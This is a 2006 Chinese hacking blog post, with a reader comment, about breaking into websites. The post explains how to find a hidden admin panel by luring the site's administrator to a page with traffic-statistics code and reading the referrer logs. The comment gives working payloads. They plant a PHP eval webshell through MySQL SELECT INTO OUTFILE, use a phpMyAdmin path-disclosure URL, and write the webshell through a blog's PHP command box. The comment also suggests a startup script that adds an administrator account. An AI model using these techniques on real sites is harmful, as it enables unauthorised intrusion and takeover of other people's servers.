另类思路入侵

这些时间都在弄些站点,有些东东也脑痛的很
有些人拿到了某某网站的后台管理员帐号密码,费九牛二虎之力暴破明文密码后,无论如何扫都扫不到后台地址而苦恼,颓废..所以不管高手也好,菜鸟也罢,到了这一步也久低下了头.
其实大家不要局限于技术的思路,从另外一个方面着手就可以发现.
大家应该知道国内的统计程序.比如ITSUN.COM,51.LA..cnzz提供的免费统计服务.
我们可以利用它们某些功能来帮我们找目标站的后台目录以及文件名.
其实利用方法很简单
注册后,把统计代码挂到你的页子上.(在这里推荐用ITSUN的比较好,上次就是它帮我发现了百度网站联盟的后台管理地址,还有一些好东东:))
然后通过一些方法让目标网站的管理员访问你挂统计代码的那个叶子就OK了,
比如,去他的站提交友情连接,一般管理员都会点击看的.
之后呢,回到流量统计服务站,看 今日来路统计 就会出现 今日来访站点www.xxxx.com
在这里就要注意了,它不会把URL全部显示出来,你需要把鼠标指针移动到那个站点上,在单击右键就会在IE进度栏中出现他的后台地址,一般而言,管理员验证连接都是从后台看的,所以流量统计就记录了访问数据.

这里只是提供一个简单的思路而已
在很多入侵的过程中,往往思路才是最为重要的,只要你有了好的思路,也就成功了一大半了
像这个http://www.wolfexp.net/forum/read.php?tid=1388,轮回写的一个东东,也是一个思路的问题,像马骏上次入侵某大学,就是通在网上邻居里加入服务器的IP地址来完成入侵的,很多很多的例子都说明思路才是最重要的。

写着写着郁闷了,网突然上不了了
只好用无线上来继续了。气死人了,球也看不了了,世界杯啊……

2006-07 /amxku

关键词: 渗透 , 入侵 , 技术

上一篇: 几个常见端口的关闭
下一篇: mysql的入侵

相关文章
访客评论
#1
回复 4a 2006-07-10, 03:59:25
后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个<?eval($_POST[a]);?>的最小马

'

0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们<?eval($_POST[a]);?>的十六进制,这种方法对phpmyadmin比较普遍,先利用phpmyadmin的路径泄露漏洞,比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。


就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')    


select cmd from a into outfile '路径/b.php'

DROP TABLE IF EXISTS a

访问b.php就会生成一个<?eval($_POST[a]);?>的最小马。

如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码:

<?

$sa = fopen("./up/saiy.php","w");

fwrite($sa,"<?eval(\$_POST[a]);?".">");

fclose($sa);

?>


就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马,

最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当前目录生成一个a.php的最小马。
发表评论

评论内容 (必填):